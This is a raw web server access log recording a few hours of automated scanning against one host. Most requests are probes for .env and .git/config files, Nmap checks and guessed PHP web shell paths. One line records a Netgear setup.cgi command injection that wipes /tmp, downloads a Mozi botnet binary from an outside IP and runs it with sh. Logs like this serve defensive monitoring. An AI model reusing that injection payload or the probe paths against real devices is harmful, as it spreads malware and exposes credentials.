+[26/Jan/2026:18:05:35 +0000] 404 - GET http 91.82.215.191 "/dashboard/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3" "-" +[26/Jan/2026:18:05:35 +0000] 404 - GET http 91.82.215.191 "/test/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.4) Gecko/20060527 SUSE/1.5.0.4-1.7 Firefox/1.5.0.4 Mnenhy/0.7.4.0" "-" +[26/Jan/2026:18:05:36 +0000] 404 - GET http 91.82.215.191 "/smtp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; chromeframe/30.0.1599.101; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; WinNT-EVI 12.01.2010; MS-RTC LM 8; .NET CLR 2.0.50727; lib/5.0\x5C0195; Engine/4.00195; 89670803)" "-" +[26/Jan/2026:18:05:36 +0000] 404 - GET http 91.82.215.191 "/ftp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1; HUAWEI CUN-L22 Build/HUAWEICUN-L22; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36" "-" +[26/Jan/2026:18:05:36 +0000] 404 - GET http 91.82.215.191 "/wiki/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36" "-" +[26/Jan/2026:18:05:36 +0000] 404 - GET http 91.82.215.191 "/help/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36" "-" +[26/Jan/2026:18:05:37 +0000] 404 - GET http 91.82.215.191 "/blog/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-NZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13" "-" +[26/Jan/2026:18:07:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:11:21 +0000] 200 - GET http www.pornhub.com "/" [Client 192.142.25.95] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:18:32:52 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:33:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:43:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:46:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:18:47:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:50:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.84.119.195] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[26/Jan/2026:18:50:41 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:18:59:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:01:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:15:14 +0000] 404 - GET http 91.82.215.191 "/developmentserver/metadatauploader" [Client 52.165.89.103] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[26/Jan/2026:19:18:46 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:19:24:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:31:12 +0000] 200 - GET http localhost "/" [Client 192.142.25.95] [Length 1033] [Gzip -] "-" "-" +[26/Jan/2026:19:33:19 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 35.231.82.142] [Length 1033] [Gzip -] "\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\x22" "-" +[26/Jan/2026:19:34:31 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 35.231.82.142] [Length 1033] [Gzip -] "-" "-" +[26/Jan/2026:19:35:12 +0000] 400 - GET http localhost "/" [Client 35.231.82.142] [Length 252] [Gzip -] "-" "-" +[26/Jan/2026:19:35:12 +0000] 400 - POST http 91-82-215-191.pool.digikabel.hu "/sdk" [Client 35.231.82.142] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/nmaplowercheck1769456111" [Client 35.231.82.142] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/nmaplowercheck1769456111" [Client 35.231.82.142] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 35.231.82.142] [Length 1033] [Gzip -] "-" "-" +[26/Jan/2026:19:35:12 +0000] 404 - POST http 91-82-215-191.pool.digikabel.hu "/sdk" [Client 35.231.82.142] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/HNAP1" [Client 35.231.82.142] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/HNAP1" [Client 35.231.82.142] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/evox/about" [Client 35.231.82.142] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/evox/about" [Client 35.231.82.142] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" +[26/Jan/2026:19:35:12 +0000] 400 - GET http localhost "/" [Client 35.231.82.142] [Length 252] [Gzip -] "-" "-" +[26/Jan/2026:19:35:12 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 35.231.82.142] [Length 1033] [Gzip -] "-" "-" +[26/Jan/2026:19:35:12 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 35.231.82.142] [Length 252] [Gzip -] "-" "-" +[26/Jan/2026:19:35:12 +0000] 200 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 35.231.82.142] [Length 1033] [Gzip -] "-" "-" +[26/Jan/2026:19:35:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:19:36:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 35.231.82.142] [Length 568] [Gzip 1.86] "Python/3.11 aiohttp/3.13.3" "-" +[26/Jan/2026:19:37:09 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:37:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:37:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:50:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:19:56:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:19:57:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:20:16:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:20:21:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:20:23:04 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:20:34:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:20:41:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:20:45:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:20:47:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 18.219.255.99] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[26/Jan/2026:20:51:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:01:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[26/Jan/2026:21:06:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:08:37 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:13:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.65.132.5] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:21:15:02 +0000] 404 - POST http 91.82.215.191 "/HNAP1/" [Client 103.208.231.196] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:21:18:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:20:53 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:22:47 +0000] 404 - GET http localhost-nginx-proxy-manager "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.21.42.143:41090/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1" [Client 202.21.42.143] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:21:23:03 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[26/Jan/2026:21:27:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:21:29:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:29:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:48:04 +0000] 400 - GET http 91.82.215.191 "/" [Client 134.199.161.98] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[26/Jan/2026:21:48:05 +0000] 400 - GET http 91.82.215.191 "/t4" [Client 134.199.161.98] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:21:48:06 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 134.199.161.98] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[26/Jan/2026:21:50:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:53:46 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:21:57:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:03:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:22:09:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:15:17 +0000] 400 - GET http 91.82.215.191 "/.env" [Client 107.170.62.119] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[26/Jan/2026:22:15:18 +0000] 400 - GET http 91.82.215.191 "/.git/config" [Client 107.170.62.119] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[26/Jan/2026:22:15:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.168.7.129] [Length 154] [Gzip -] "-" "-" +[26/Jan/2026:22:19:51 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 87.236.176.32] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[26/Jan/2026:22:21:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:23:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:24:18 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.1; Moto G Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36" "-" +[26/Jan/2026:22:39:22 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:40:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:22:47:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:50:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:22:54:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:10:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:14:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[26/Jan/2026:23:16:35 +0000] 404 - GET http 91.82.215.191 "/dispatch.asp" [Client 45.194.92.38] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[26/Jan/2026:23:16:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/f5.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/vlmusbou.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/zbcymrkz.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/fabes.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/55.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/jb.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/948031977f.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/nlvjg.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/ne.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/V2_xml.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/img.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/zz8.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/0w1d.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/hywkehxf.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/1100.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/auth.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/iov.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/rendi59.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/rivasqup.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/zrerbwfu.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/lock1.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/ec.inc.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/lufix.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/nexopjiy.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/obfuscate.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/sfcl.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/403.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/xl6.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/dddd.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/xsas.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/acxx.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/vx.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws29.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/bjfl.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/gettest.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/18299.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" +[26/Jan/2026:23:16:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/358ox1n8.php" [Client 4.217.180.34] [Length 150] [Gzip -] "-" "-" 